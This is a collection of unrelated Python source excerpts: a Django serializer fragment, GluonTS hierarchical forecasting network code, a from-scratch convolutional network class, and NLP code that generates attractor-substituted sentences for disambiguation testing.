cpInstanceId = serializers.CharField(
help_text="Identifier of the external CP of the VNF connected to this link port.",
required=False,
allow_null=True,
allow_blank=True
)
# class ExtVirtualLinkInfoSerializer(serializers.Serializer):
# id = serializers.CharField(
# help_text="Identifier | |
<gh_stars>10-100
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# Standard library imports
from typing import List, Tuple
from itertools import product
# Third-party imports
import mxnet as mx
import numpy as np
# First-party imports
from gluonts.core.component import validated
from gluonts.mx import Tensor
from gluonts.mx.distribution import DistributionOutput
from gluonts.mx.util import assert_shape, weighted_average
from gluonts.mx.distribution import LowrankMultivariateGaussian
from gluonts.model.deepvar._network import DeepVARNetwork
class DeepHierNetwork(DeepVARNetwork):
@validated()
def __init__(
self,
M,
A,
num_layers: int,
num_cells: int,
cell_type: str,
history_length: int,
context_length: int,
prediction_length: int,
distr_output: DistributionOutput,
dropout_rate: float,
lags_seq: List[int],
target_dim: int,
conditioning_length: int,
cardinality: List[int] = [1],
embedding_dimension: int = 1,
scaling: bool = True,
seq_axis: List[int] = None,
**kwargs,
) -> None:
super().__init__(
num_layers=num_layers,
num_cells=num_cells,
cell_type=cell_type,
history_length=history_length,
context_length=context_length,
prediction_length=prediction_length,
distr_output=distr_output,
dropout_rate=dropout_rate,
lags_seq=lags_seq,
target_dim=target_dim,
conditioning_length=conditioning_length,
cardinality=cardinality,
embedding_dimension=embedding_dimension,
scaling=scaling,
**kwargs
)
self.M = M
self.A = A
self.seq_axis = seq_axis
def reconcile_samples(self, samples):
"""
Computes coherent samples by projecting unconstrained `samples` using the matrix `self.M`.
Parameters
----------
samples
Unconstrained samples.
Shape: (num_samples, batch_size, seq_len, num_ts) during training and
(num_parallel_samples x batch_size, seq_len, num_ts) during prediction.
Returns
-------
Coherent samples
Tensor, shape same as that of `samples`.
"""
if self.seq_axis:
# bring the axis to iterate in the beginning
samples = mx.nd.moveaxis(samples, self.seq_axis, list(range(len(self.seq_axis))))
out = [
mx.nd.dot(samples[idx], self.M, transpose_b=True)
for idx in product(*[range(x) for x in [samples.shape[d] for d in range(len(self.seq_axis))]])
]
# put the axis in the correct order again
out = mx.nd.concat(*out, dim=0).reshape(samples.shape)
out = mx.nd.moveaxis(out, list(range(len(self.seq_axis))), self.seq_axis)
return out
else:
return mx.nd.dot(samples, self.M, transpose_b=True)
def train_hybrid_forward(
self,
F,
target_dimension_indicator: Tensor,
past_time_feat: Tensor,
past_target_cdf: Tensor,
past_observed_values: Tensor,
past_is_pad: Tensor,
future_time_feat: Tensor,
future_target_cdf: Tensor,
future_observed_values: Tensor,
epoch_frac: float,
) -> Tuple[Tensor, ...]:
"""
Computes the loss for training DeepVAR, all inputs tensors representing
time series have NTC layout.
Parameters
----------
F
target_dimension_indicator
Indices of the target dimension (batch_size, target_dim)
past_time_feat
Dynamic features of past time series (batch_size, history_length,
num_features)
past_target_cdf
Past marginal CDF transformed target values (batch_size,
history_length, target_dim)
past_observed_values
Indicator whether or not the values were observed (batch_size,
history_length, target_dim)
past_is_pad
Indicator whether the past target values have been padded
(batch_size, history_length)
future_time_feat
Future time features (batch_size, prediction_length, num_features)
future_target_cdf
Future marginal CDF transformed target values (batch_size,
prediction_length, target_dim)
future_observed_values
Indicator whether or not the future values were observed
(batch_size, prediction_length, target_dim)
Returns
-------
distr
Loss with shape (batch_size, 1)
likelihoods
Likelihoods for each time step
(batch_size, context + prediction_length, 1)
distr_args
Distribution arguments (context + prediction_length,
number_of_arguments)
"""
seq_len = self.context_length + self.prediction_length
# unroll the decoder in "training mode", i.e. by providing future data
# as well
rnn_outputs, _, scale, lags_scaled, inputs = self.unroll_encoder(
F=F,
past_time_feat=past_time_feat,
past_target_cdf=past_target_cdf,
past_observed_values=past_observed_values,
past_is_pad=past_is_pad,
future_time_feat=future_time_feat,
future_target_cdf=future_target_cdf,
target_dimension_indicator=target_dimension_indicator,
)
# put together target sequence
# (batch_size, seq_len, target_dim)
target = F.concat(
past_target_cdf.slice_axis(
axis=1, begin=-self.context_length, end=None
),
future_target_cdf,
dim=1,
)
# assert_shape(target, (-1, seq_len, self.target_dim))
distr, distr_args = self.distr(
time_features=inputs,
rnn_outputs=rnn_outputs,
scale=scale,
lags_scaled=lags_scaled,
target_dimension_indicator=target_dimension_indicator,
seq_len=self.context_length + self.prediction_length,
)
# Assert CRPS_weight, likelihood_weight, and coherent_train_samples have harmonious values
assert self.CRPS_weight >= 0.0, 'CRPS weight must be non-negative'
assert self.likelihood_weight >= 0.0, 'Likelihood weight must be non-negative!'
assert self.likelihood_weight + self.CRPS_weight > 0.0, 'At least one of CRPS or likelihood weights must be non-zero'
if self.CRPS_weight == 0.0 and self.coherent_train_samples:
assert 'No sampling being performed. coherent_train_samples flag is ignored'
if not self.sample_LH == 0.0 and self.coherent_train_samples:
assert 'No sampling being performed. coherent_train_samples flag is ignored'
if self.likelihood_weight == 0.0 and self.sample_LH:\
assert 'likelihood_weight is 0 but sample likelihoods are still being calculated. Set sample_LH=0 when likelihood_weight=0'
# Sample from multivariate Gaussian distribution if we are using CRPS or LH-sample loss
# dim: (num_samples, batch_size, seq_len, m)
if self.sample_LH or (self.CRPS_weight > 0.0):
raw_samples = distr.sample_rep(num_samples=self.num_samples_for_loss, dtype='float32')
# Only project during training if we have already sampled
if self.coherent_train_samples and epoch_frac > self.warmstart_epoch_frac:
coherent_samples = self.reconcile_samples(raw_samples)
assert_shape(coherent_samples, raw_samples.shape)
samples = coherent_samples
else:
samples = raw_samples
# Compute likelihoods (always do this step)
# we sum the last axis to have the same shape for all likelihoods
# (batch_size, seq_len, 1)
# calculates likelihood of NN prediction under the current learned distribution parameters
if self.sample_LH: # likelihoods on samples
# Compute mean and variance
mu = samples.mean(axis=0)
var = mx.nd.square(samples - samples.mean(axis=0)).mean(axis=0)
likelihoods = -LowrankMultivariateGaussian(
dim=samples.shape[-1], rank=0, mu=mu, D=var
).log_prob(target).expand_dims(axis=-1)
else: # likelihoods on network params
likelihoods = -distr.log_prob(target).expand_dims(axis=-1)
assert_shape(likelihoods, (-1, seq_len, 1))
# Pick loss function approach. This avoids sampling if we are only training with likelihoods on params
if self.CRPS_weight > 0.0: # and epoch_frac > self.warmstart_epoch_frac:
loss_CRPS = distr.crps(samples, target)
loss_unmasked = self.CRPS_weight * loss_CRPS + self.likelihood_weight * likelihoods
else: # CRPS_weight = 0.0 (asserted non-negativity above)
loss_unmasked = likelihoods
# get mask values
past_observed_values = F.broadcast_minimum(
past_observed_values, 1 - past_is_pad.expand_dims(axis=-1)
)
# (batch_size, subseq_length, target_dim)
observed_values = F.concat(
past_observed_values.slice_axis(
axis=1, begin=-self.context_length, end=None
),
future_observed_values,
dim=1,
)
# mask the loss at one time step if one or more observations is missing
# in the target dimensions (batch_size, subseq_length, 1)
loss_weights = observed_values.min(axis=-1, keepdims=True)
assert_shape(loss_weights, (-1, seq_len, 1)) #-1 is batch axis size
loss = weighted_average(
F=F, x=loss_unmasked, weights=loss_weights, axis=1
)
assert_shape(loss, (-1, -1, 1))
self.distribution = distr
return (loss, likelihoods) + distr_args
def reconciliation_error(self, samples):
r"""
Computes the maximum relative reconciliation error among all the aggregated time series
.. math::
\max_i \frac{|y_i - s_i|} {|y_i|},
where :math:`i` refers to the aggregated time series index, :math:`y_i` is the (direct) forecast obtained for
the :math:`i^{th}` time series and :math:`s_i` is its aggregated forecast obtained by summing the corresponding
bottom-level forecasts. If :math:`y_i` is zero, then the absolute difference, :math:`|s_i|`, is used instead.
This can be comupted as follows given the constraint matrix A:
.. math::
\max \frac{|A \times samples|} {|samples[:r]|},
where :math:`r` is the number aggregated time series.
Parameters
----------
samples
Samples. Shape: `(*batch_shape, target_dim)`.
Returns
-------
Float
Reconciliation error
"""
num_agg_ts = self.A.shape[0]
forecasts_agg_ts = samples.slice_axis(
axis=-1, begin=0, end=num_agg_ts
).asnumpy()
abs_err = mx.nd.abs(mx.nd.dot(samples, self.A, transpose_b=True)).asnumpy()
rel_err = np.where(
forecasts_agg_ts == 0,
abs_err,
abs_err / np.abs(forecasts_agg_ts),
)
return np.max(rel_err)
def sampling_decoder(
self,
F,
past_target_cdf: Tensor,
target_dimension_indicator: Tensor,
time_feat: Tensor,
scale: Tensor,
begin_states: List[Tensor],
) -> Tensor:
"""
Computes sample paths by unrolling the RNN starting with a initial
input and state.
Parameters
----------
past_target_cdf
Past marginal CDF transformed target values (batch_size,
history_length, target_dim)
target_dimension_indicator
Indices of the target dimension (batch_size, target_dim)
time_feat
Dynamic features of future time series (batch_size, history_length,
num_features)
scale
Mean scale for each time series (batch_size, 1, target_dim)
begin_states
List of initial states for the RNN layers (batch_size, num_cells)
Returns
--------
sample_paths : Tensor
A tensor containing sampled paths. Shape: (1, num_sample_paths,
prediction_length, target_dim).
"""
def repeat(tensor):
return tensor.repeat(repeats=self.num_parallel_samples, axis=0)
# blows-up the dimension of each tensor to
# batch_size * self.num_sample_paths for increasing parallelism
repeated_past_target_cdf = repeat(past_target_cdf)
repeated_time_feat = repeat(time_feat)
repeated_scale = repeat(scale)
repeated_target_dimension_indicator = repeat(
target_dimension_indicator
)
# slight difference for GPVAR and DeepVAR, in GPVAR, its a list
repeated_states = self.make_states(begin_states)
future_samples = []
# for each future time-units we draw new samples for this time-unit
# and update the state
for k in range(self.prediction_length):
lags = self.get_lagged_subsequences(
F=F,
sequence=repeated_past_target_cdf,
sequence_length=self.history_length + k,
indices=self.shifted_lags,
subsequences_length=1,
)
rnn_outputs, repeated_states, lags_scaled, inputs = self.unroll(
F=F,
begin_state=repeated_states,
lags=lags,
scale=repeated_scale,
time_feat=repeated_time_feat.slice_axis(
axis=1, begin=k, end=k + 1
),
target_dimension_indicator=repeated_target_dimension_indicator,
unroll_length=1,
)
distr, distr_args = self.distr(
time_features=inputs,
rnn_outputs=rnn_outputs,
scale=repeated_scale,
target_dimension_indicator=repeated_target_dimension_indicator,
lags_scaled=lags_scaled,
seq_len=1,
)
# (num_parallel_samples*batch_size, 1, m)
# new_samples are not coherent (initially)
new_incoherent_samples = distr.sample()
# reconcile new_incoherent_samples if coherent_pred_samples=True, use new_incoherent_samples if False
if self.coherent_pred_samples:
new_coherent_samples = self.reconcile_samples(new_incoherent_samples)
assert_shape(new_coherent_samples, new_incoherent_samples.shape)
if self.compute_reconciliation_error:
recon_err = self.reconciliation_error(samples=new_coherent_samples)
| |
<reponame>abel-gr/AbelNN
# Copyright <NAME>. All Rights Reserved.
# https://github.com/abel-gr/AbelNN
import numpy as np
import copy as copy
import random
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from pylab import text
import math
class ConvNetAbel:
version = 1.2
def __init__(self, hidden = [1], nEpochs = 1, learningRate=0.1, manualWeights=[],
debugLevel=1, rangeRandomWeight=None, showLogs=False, softmax=False,
activationFunction='leakyrelu', verbose = False, use='classification',
batch_size=1, batch_gradient='average', batch_mult=1, dropout=0, pre_norm=False,
shuffle=True, iterationDrop=0, convFilters = [32, 64, 128], convStride=2,
convFilterSizes=3, learningRateConv=0.001, convEpochs=10, kernel_initializer='he_normal'):
self.hiddenL = copy.deepcopy(hidden)
self.hiddenL2 = copy.deepcopy(hidden)
self.learningRate = learningRate
self.numEpochs = nEpochs
self.costs = [] # Costs list to check performance
self.debugWeights = []
self.meanCostByEpoch = []
self.hiddenWeights = []
self.manualWeights = manualWeights
self.debugMode = debugLevel
self.rangeRandomWeight = rangeRandomWeight
self.showLogs = showLogs
self.softmax = softmax
self.n_layer0 = -1
self.activationFunction = activationFunction
self.verbose = verbose
self.use = use
self.batch_size = batch_size
self.batch_gradient = batch_gradient
self.batch_mult = batch_mult
self.dropout = dropout
self.pre_norm = pre_norm
self.shuffle = shuffle
self.iterationDrop = iterationDrop
self.XavierInitialization = '1'
self.lastLayerNeurons = -1
# ConvNet:
self.convFilters = convFilters
self.filtersValues = [None] * len(convFilters)
self.convStride = convStride
self.convFilterSizes = convFilterSizes
self.learningRateConv = learningRateConv
self.convEpochs = convEpochs
self.kernel_initializer = kernel_initializer
# Conv2 with only one kernel
def conv2(self, x, kernel, stride=1):
output = [] #np.zeros((kernel.shape), dtype=np.float32)
kernel_l = kernel.shape[0]
kernel_size = kernel.shape[0] * kernel.shape[1]
c = int(kernel_l / 2)
for i in range(c, x.shape[0] - c, stride):
o = []
for j in range(c, x.shape[1] - c, stride):
i0 = i - c
j0 = j - c
i1 = i + c + 1
j1 = j + c + 1
o.append(np.sum(x[i0:i1, j0:j1] * kernel))
output.append(o)
output = np.asarray(output)
return output
# Convolution with multi-filters
def conv_filters(self, x, filters, stride=1, relu=False, mode='same'):
lex = len(x.shape)
lef = len(filters.shape)
if lex > lef:
print('conv_filters: The input array cannot have more dimensions than the filter array.')
return 0
output = []
kernel_l = filters.shape[0]
kernel_size = filters.shape[0] * filters.shape[1]
if lef == 2:
num_filters = 1
else:
num_filters = filters.shape[-1]
c = int(kernel_l / 2)
dim3 = False
evenShapeKernel = (kernel_l % 2 == 0)
if lex == 2:
dim2 = True
p0 = x.shape[0]
p1 = x.shape[1]
else:
# x parameter was the output of this method previously called
if lex == lef:
num_new_filters = int(num_filters / x.shape[-1])
if (num_new_filters % 2 != 0) and (num_filters % 2 == 0):
num_new_filters = num_new_filters - 1
if (num_new_filters == 0):
num_new_filters = 1
else: # It is the first convolutional layer of a color image
num_new_filters = num_filters
dim3 = True
dim2 = False
p0 = x.shape[0]
p1 = x.shape[1]
if mode == 'full':
fs0 = int(filters.shape[0] / 2)
fs1 = int(filters.shape[1] / 2)
max0 = p0 + fs0
max1 = p1 + fs1
ini0 = -1 * fs0
ini1 = -1 * fs1
elif mode == 'same':
max0 = p0
max1 = p1
ini0 = 0
ini1 = 0
elif mode == 'valid':
fs0 = int(filters.shape[0] / 2)
fs1 = int(filters.shape[1] / 2)
max0 = p0 - fs0
max1 = p1 - fs1
ini0 = fs0
ini1 = fs1
else:
print('Mode must be same, valid or full')
return 0
if evenShapeKernel and mode == 'valid':
max0 = max0 + 1
max1 = max1 + 1
for i in range(ini0, max0, stride):
o = []
for j in range(ini1, max1, stride):
i0 = i - c
j0 = j - c
i1 = i + c + 1
j1 = j + c + 1
if evenShapeKernel:
i0 = i0 + 1
j0 = j0 + 1
zero_padding_top = 0
zero_padding_bottom = 0
zero_padding_left = 0
zero_padding_right = 0
if i0 < 0:
zero_padding_top = abs(i0)
i0 = 0
if j0 < 0:
zero_padding_left = abs(j0)
j0 = 0
if i1 > p0:
zero_padding_bottom = i1 - p0
i1 = p0
if j1 > p1:
zero_padding_right = j1 - p1
j1 = p1
if dim2:
m = x[i0:i1, j0:j1]
#print('mshape:', m.shape, kernel_size, zero_padding_top, zero_padding_left)
# Zero padding:
m = np.pad(m, ((zero_padding_top,zero_padding_bottom),(zero_padding_left,zero_padding_right)), 'constant')
if lef != 2:
m = np.expand_dims(m, axis=-1)
m = np.repeat(m, num_filters, axis=-1)
else:
xi = x[i0:i1, j0:j1, :]
# Zero padding:
xi = np.pad(xi, ((zero_padding_top,zero_padding_bottom),(zero_padding_left,zero_padding_right),(0,0)), 'constant')
if dim3:
xi = np.expand_dims(xi, axis=-1)
m = np.repeat(xi, num_new_filters, axis=-1)
#print('M,F\n', m[:,:,0], filters[:,:,0])
#print(m.shape, filters.shape)
m = m * filters
#print('m*f\n', m[:,:,0])
m = np.sum(m, axis=0)
m = np.sum(m, axis=0)
if dim3:
m = np.sum(m, axis=0)
o.append(m)
output.append(o)
output = np.asarray(output)
if relu:
output[output < 0] = 0
return output
def kernelInitializer(self, i, ksize, inSize, outSize):
if 'xavier' in self.kernel_initializer:
if self.kernel_initializer == 'xavier_normal':
if len(ksize) == 4:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2],ksize[3]) * math.sqrt(2.0 / (inSize + outSize))
else:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2]) * math.sqrt(2.0 / (inSize + outSize))
elif self.kernel_initializer == 'xavier_uniform':
highVal = math.sqrt(6.0 / (inSize + outSize))
lowVal = -1 * highVal
self.filtersValues[i] = np.random.uniform(low=lowVal, high=highVal, size=ksize)
else:
if self.kernel_initializer == 'he_normal':
if len(ksize) == 4:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2],ksize[3]) * math.sqrt(2.0 / inSize)
else:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2]) * math.sqrt(2.0 / inSize)
elif self.kernel_initializer == 'he_uniform':
highVal = math.sqrt(6.0 / inSize)
lowVal = -1 * highVal
self.filtersValues[i] = np.random.uniform(low=lowVal, high=highVal, size=ksize)
def convLayersFeedForward(self, im):
self.convInputs = []
len_m = len(im.shape)
#print('len_m:', len_m)
for i, cl in enumerate(self.convFilters):
self.convInputs.append(im)
if (self.filtersValues[i] is None):
if (type(self.convFilterSizes) == list):
ks = self.convFilterSizes[i]
else:
ks = self.convFilterSizes
inSize = np.prod(im.shape)
if 'xavier' in self.kernel_initializer:
if self.batch_size == 1:
imshape = np.asarray([im.shape[0], im.shape[1]])
else:
imshape = np.asarray([im.shape[1], im.shape[2]])
extraShape = int((ks % 2) == 0)
ks2 = int(ks / 2) * 2
outSize = np.prod((imshape - ks2 + extraShape)) * cl
else:
outSize = 0
if i == 0 and len_m == 3:
if self.batch_size == 1:
self.kernelInitializer(i, (ks,ks,im.shape[2],cl), inSize, outSize)
else:
self.kernelInitializer(i, (ks,ks,cl), inSize, outSize)
else:
self.kernelInitializer(i, (ks,ks,cl), inSize, outSize)
k_filters = self.filtersValues[i]
if (type(self.convStride) == list):
stride_par = self.convStride[i]
else:
stride_par = self.convStride
#print('Convolutional layer', i, '\n')
#print('Layer input shape:', im.shape)
#print('Layer filters array shape:', k_filters.shape)
# Start of convolutions
#im = self.conv_filters(im, k_filters, relu=True, stride=stride_par, mode='valid')
filtersValues_shape01 = np.asarray([k_filters.shape[0], k_filters.shape[1]])
filtersValues_shape_d2 = (filtersValues_shape01 / 2).astype(int)
extraShape = (filtersValues_shape01 % 2) == 0
eS0 = extraShape[0].astype(int)
eS1 = extraShape[1].astype(int)
posYf = eS0
posXf = eS1
filter_shape0 = k_filters.shape[0]
filter_shape1 = k_filters.shape[1]
if (len(k_filters.shape) >= 3):
num_filters = k_filters.shape[-1]
else:
num_filters = 1
if self.batch_size == 1:
xshape = np.asarray([im.shape[0], im.shape[1]])
else:
xshape = np.asarray([im.shape[1], im.shape[2]])
output_shape = xshape - filtersValues_shape_d2*2 + eS0
if ((len(im.shape) < len(k_filters.shape)) or (len(im.shape) == 2 and num_filters == 1)):
Xr = np.expand_dims(im, axis=-1)
Xr = np.repeat(Xr, num_filters, axis=-1)
else:
if (len(im.shape) == len(k_filters.shape)):
if self.batch_size == 1:
new_filters = int(im.shape[-1] / num_filters)
Xr = np.repeat(im, new_filters, axis=-1)
else:
Xr = np.expand_dims(im, axis=-1)
Xr = np.repeat(Xr, num_filters, axis=-1)
else:
Xr = im
if (len(Xr.shape) == 2):
npad = ((0,eS0), (0,eS1))
out_s = [output_shape[0], output_shape[1], 1]
elif (len(Xr.shape) == 3):
npad = ((0,eS0), (0,eS1), (0,0))
out_s = [output_shape[0], output_shape[1], num_filters]
elif (len(Xr.shape) == 4):
if self.batch_size == 1:
npad = ((0,eS0), (0,eS1), (0,0), (0,0))
out_s = [output_shape[0], output_shape[1], im.shape[2], num_filters]
else:
npad = ((0,0), (0,eS0), (0,eS1), (0,0))
out_s = [im.shape[0], output_shape[0], output_shape[1], | |
- len(ws_tokens[ws_token_id].split()) + attractor_len
if rep_id == src_rep_loc:
updated_ambiguous_focus_term_ws_id = updated_rep_id
updated_ambiguous_term_ws_ids.append(updated_rep_id)
assert ws_tokens[spacy_to_ws_map[src_rep_loc][0]] == new_sent_tokens[updated_ambiguous_focus_term_ws_id], \
'Mismatch between token at ambiguous token position in the original sentence \'{}\' | \'{}\' ' \
'and generated sample \'{}\' | \'{}\''.format(src_sent.strip(), spacy_to_ws_map[src_rep_loc][0],
new_sent, updated_ambiguous_focus_term_ws_id)
assert updated_ambiguous_focus_term_ws_id in updated_ambiguous_term_ws_ids, \
'Term ID adjustment mismatch: Focus term ID: {}, ambiguous term IDs: {}' \
.format(updated_ambiguous_focus_term_ws_id, updated_ambiguous_term_ws_ids)
# Check if duplicate
if seen_samples.get(new_sent, None):
if seen_samples[new_sent] == (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id):
continue
else:
seen_samples[new_sent] = (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id)
adversarial_samples.append((new_sent,
updated_ambiguous_term_ws_ids,
updated_ambiguous_focus_term_ws_id,
attractor_ws_ids))
return adversarial_samples, seen_samples
def _replace_attractor_at_other_nouns(src_sent,
src_rep,
src_rep_loc,
attractor_term,
attractor_table,
seed_attractor_tokens,
adversarial_attractor_tokens,
general_modifier_tokens,
general_modifier_lemmas,
filter_bigrams,
window_size,
seen_samples,
attractor_cluster_id,
seed_parses,
disable_modifiers,
disable_ngrams):
""" Generates adversarial samples from a single seed sentence by replacing seed sentence tokens of the same POS
category as the attractor term with the attractor
(except for cases where the seed token modifies the ambiguous noun). """
def _is_non_positive(adjective):
""" Helper function for checking whether the specified adjective is a comparative or superlative """
# Count non-consecutive vowels
vowel_seq = list()
for ch in adjective:
if ch in VOWELS:
if len(vowel_seq) == 0:
vowel_seq.append(1)
else:
if vowel_seq[-1] != 1:
vowel_seq.append(1)
else:
vowel_seq.append(0)
if sum(vowel_seq) == 2:
return True
# Track samples to reduce duplicates
orig_seen_samples = seen_samples
# Process source sequence
spacy_sent_rep = seed_parses[src_sent][0]
spacy_tokens_lower = seed_parses[src_sent][1]
ws_tokens = seed_parses[src_sent][2]
spacy_to_ws_map = seed_parses[src_sent][4]
spacy_src_rep_ids = list()
spacy_rel_pos_ids = list()
adversarial_samples = list()
tokens_to_modify = list()
# Only replace adjectives if they modify a noun to reduce ungrammatical samples
for rep_id, rep in enumerate(spacy_sent_rep):
if rep.pos_ in ['NOUN'] and rep_id != src_rep_loc:
# Get rep lemma
rep_lemma = rep.lower_ if \
rep.lemma_ == '-PRON-' or rep.lemma_.isdigit() else rep.lemma_.lower()
rep_lemma = rep_lemma.strip(punctuation_plus_space)
# Check children for adjectives to replace
children = [child for child in rep.children]
for child in children:
if child.pos_ == 'ADJ' and child.text not in [tpl[0] for tpl in tokens_to_modify] \
and child.text.lower().strip(string.punctuation) not in QUANTIFIERS:
if child.text[0] == child.text[0].lower(): # Exclude 'proper noun adjectives', e.g. 'the Spanish'
tokens_to_modify.append((child.text, child.i, rep.text, rep_lemma))
# Check if attractor is permissible
for adj, adj_loc, noun_token, noun_lemma in tokens_to_modify:
if not disable_modifiers:
modifier_tokens = general_modifier_tokens.get(noun_lemma, None)
modifier_lemmas = general_modifier_lemmas.get(noun_lemma, None)
if modifier_tokens is None:
continue
else:
# Check whether the modified noun should be modified by the current attractor
keep_attractor_term = _score_attractor_with_modifiers(attractor_term,
attractor_table,
modifier_tokens,
modifier_lemmas,
seed_attractor_tokens,
adversarial_attractor_tokens)
if not keep_attractor_term:
continue
if adj_loc not in spacy_rel_pos_ids:
if not disable_ngrams:
# Avoid breaking-up collocations
term_to_replace = adj.lower().strip(punctuation_plus_space)
if filter_bigrams.get(term_to_replace, None) is not None and attractor_term not in INTENSIFIERS:
modified_term = noun_token.lower().strip(punctuation_plus_space)
bigram_count = filter_bigrams[term_to_replace].get(modified_term, 0)
if bigram_count >= 300:
continue
# Filter with bigrams
if filter_bigrams.get(attractor_term, None) is not None and attractor_term not in INTENSIFIERS:
modified_term = noun_token.lower().strip(punctuation_plus_space)
bigram_count = filter_bigrams[attractor_term].get(modified_term, 0.)
if bigram_count < 10:
if attractor_term.endswith('er'):
if filter_bigrams.get(attractor_term[:-2], None) is not None:
bigram_count = filter_bigrams[attractor_term[:-2]].get(modified_term, 0.)
if attractor_term.endswith('est'):
if filter_bigrams.get(attractor_term[:-3], None) is not None:
bigram_count = filter_bigrams[attractor_term[:-3]].get(modified_term, 0.)
if bigram_count < 10:
continue
# Check if insertion constraints are violated
if spacy_sent_rep[adj_loc].text.lower().strip(punctuation_plus_space) == attractor_term:
continue
try:
left_context = spacy_sent_rep[adj_loc - 1]
except IndexError:
left_context = None
try:
right_context = spacy_sent_rep[adj_loc + 1]
except IndexError:
right_context = None
if right_context is not None:
if right_context.pos_ not in ['NOUN', 'PROPN'] or \
(right_context.text.lower().strip(punctuation_plus_space) == attractor_term):
continue
if left_context is not None:
if left_context.pos_ in ['ADJ', 'PROPN'] or left_context.text == '@-@':
continue
if adj_loc > 1:
if spacy_sent_rep[adj_loc - 2].text in ['a', 'an', 'the']:
continue
if adj_loc < (len(spacy_sent_rep) - 2):
# Avoid modifying compounds (e.g. 'arm strength')
if spacy_sent_rep[adj_loc + 2].pos_ in ['NOUN', 'PROPN']:
continue
spacy_rel_pos_ids.append(adj_loc)
# Detect appropriate positions
for token_id, token in enumerate(spacy_tokens_lower):
if token in BLACKLIST:
continue
# Remove punctuation, separate compounds
sub_token_list = re.sub(r' +', ' ', token.translate(pct_stripper)).split()
sub_token_list = [sub_token.strip(punctuation_plus_space) for sub_token in sub_token_list]
for sub_token in sub_token_list:
if sub_token == src_rep:
spacy_src_rep_ids.append(token_id)
break # only one sub-token hit per token allowed
if len(spacy_src_rep_ids) == 0 or len(spacy_rel_pos_ids) == 0:
return adversarial_samples, orig_seen_samples
else:
attractor_len = len(attractor_term.split())
# Restrict set of modified terms to a window around each occurrence of the ambiguous term
if len(spacy_rel_pos_ids) > window_size > 0:
truncated_spacy_rel_pos_ids = list()
truncated_spacy_rel_pos_ids += sorted(spacy_rel_pos_ids, key=lambda x: abs(x - src_rep_loc))[:window_size]
spacy_rel_pos_ids = list(set(truncated_spacy_rel_pos_ids))
for token_id in spacy_rel_pos_ids:
# Convert to whitespace token position
ws_token_id = spacy_to_ws_map[token_id][0]
# Account for a / an
if ws_token_id > 0:
if ws_tokens[ws_token_id - 1] == 'a':
for vowel in list(VOWELS):
if attractor_term.startswith(vowel):
ws_tokens[ws_token_id - 1] = 'an'
if ws_tokens[ws_token_id - 1] == 'an':
for consonant in list(CONSONANTS):
if attractor_term.startswith(consonant):
ws_tokens[ws_token_id - 1] = 'a'
# Replace (most) adjectives with similar adjective forms
if attractor_term.endswith('er') and _is_non_positive(attractor_term):
if not (spacy_tokens_lower[token_id].endswith('er') and _is_non_positive(spacy_tokens_lower[token_id])):
continue
if attractor_term.endswith('est') and _is_non_positive(attractor_term):
if not (spacy_tokens_lower[token_id].endswith('est') and
_is_non_positive(spacy_tokens_lower[token_id])):
continue
if (not (attractor_term.endswith('er') or attractor_term.endswith('est'))) or \
(not _is_non_positive(attractor_term)):
if (spacy_tokens_lower[token_id].endswith('er') or spacy_tokens_lower[token_id].endswith('est')) and \
_is_non_positive(spacy_tokens_lower[token_id]):
continue
# Account for superlatives and ordinals
change_det = False
for suffix in ['est'] + ORDINAL_SUFFIXES:
if attractor_term.endswith(suffix):
change_det = True
break
if change_det:
if ws_token_id > 0:
if ws_tokens[ws_token_id - 1] in ['a', 'an']:
ws_tokens[ws_token_id - 1] = 'the'
# Generate samples by inserting the attractor in the neighborhood of each token of the appropriate POS
new_sent_tokens = ws_tokens[:ws_token_id] + [attractor_term] + ws_tokens[ws_token_id + 1:]
new_sent = ' '.join(new_sent_tokens)
attractor_ws_ids = [ws_token_id + attr_tok_id for attr_tok_id in range(len(attractor_term.split()))]
updated_ambiguous_term_ws_ids = list()
updated_ambiguous_focus_term_ws_id = spacy_to_ws_map[src_rep_loc][0]
for rep_id in spacy_src_rep_ids:
updated_rep_id = spacy_to_ws_map[rep_id][0]
if updated_rep_id >= ws_token_id:
updated_rep_id = updated_rep_id - len(ws_tokens[ws_token_id].split()) + attractor_len
if rep_id == src_rep_loc:
updated_ambiguous_focus_term_ws_id = updated_rep_id
updated_ambiguous_term_ws_ids.append(updated_rep_id)
assert ws_tokens[spacy_to_ws_map[src_rep_loc][0]] == new_sent_tokens[updated_ambiguous_focus_term_ws_id], \
'Mismatch between token at ambiguous token position in the original sentence \'{}\' | \'{}\' ' \
'and generated sample \'{}\' | \'{}\''.format(src_sent.strip(), spacy_to_ws_map[src_rep_loc][0],
new_sent, updated_ambiguous_focus_term_ws_id)
assert updated_ambiguous_focus_term_ws_id in updated_ambiguous_term_ws_ids, \
'Term ID adjustment mismatch: Focus term ID: {}, ambiguous term IDs: {}' \
.format(updated_ambiguous_focus_term_ws_id, updated_ambiguous_term_ws_ids)
# Check if duplicate
if seen_samples.get(new_sent, None):
if seen_samples[new_sent] == (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id):
continue
else:
seen_samples[new_sent] = (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id)
adversarial_samples.append((new_sent,
updated_ambiguous_term_ws_ids,
updated_ambiguous_focus_term_ws_id,
attractor_ws_ids))
return adversarial_samples, seen_samples
def _parse_seed(seed_sentence,
adversarial_cluster,
src_word_loc,
attractor,
seed_parses):
""" Helper function that parses the seed sentence and caches the results for greater efficiency """
# Process source sequence
if not seed_parses.get(seed_sentence, None):
spacy_sent_rep, spacy_tokens_lower, _, _, ws_tokens, ws_tokens_lower, _, spacy_to_ws_map = \
_process_strings(seed_sentence,
nlp,
get_lemmas=False,
get_pos=True,
remove_stopwords=False,
